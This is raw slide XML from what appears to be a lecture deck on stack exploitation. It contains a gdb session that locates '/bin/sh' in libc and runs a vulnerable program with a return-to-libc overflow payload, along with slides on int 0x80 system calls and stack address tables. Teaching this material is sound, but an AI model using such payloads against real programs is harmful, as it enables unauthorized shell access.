                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) find 0xb7e26000, 0xb7fd2000, "/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xb7f8684c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>1 pattern found.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0xb7f8684c</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0xb7f8684c:	"/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>328</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2250221"/>
            <a:ext cx="1506772" cy="198782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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57200" y="3515804"/>
            <a:ext cx="7471575" cy="198782"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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61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3">
                                            <p:txEl>
                                              <p:pRg st="21" end="21"/>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3">
                                            <p:txEl>
                                              <p:pRg st="22" end="22"/>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3">
                                            <p:txEl>
                                              <p:pRg st="23" end="23"/>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3">
                                            <p:txEl>
                                              <p:pRg st="24" end="24"/>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3">
                                            <p:txEl>
                                              <p:pRg st="25" end="25"/>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3">
                                            <p:txEl>
                                              <p:pRg st="26" end="26"/>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5"/>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defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>50</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> * '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>bcde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>' + '\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>63</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>e6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x4c\x68\xf8\xb7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'"`</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas"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329</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6546976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Invoking System Calls</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System calls are usually invoked through libraries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux/x86</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> contains the system call number</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204890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857995132"/>
              </p:ext>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff714</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x2</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xb7e3faf3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>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0x0</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff85c</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10007"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff646</a:t>
                      </a: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330</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="49075" y="35704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0xbffff67c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177880035"/>
              </p:ext>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0xbffff646</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0xbffff63c</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0xbffff678</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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1800" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>8048435</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80482f0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a: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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>804841d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048420</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048423</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048426</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048429</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804842b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804842f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048432</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048435</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804843a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804843f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="is-IS" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048440</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>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0xbffff678</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="121979" y="1729012"/>
            <a:ext cx="278606" cy="45719"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
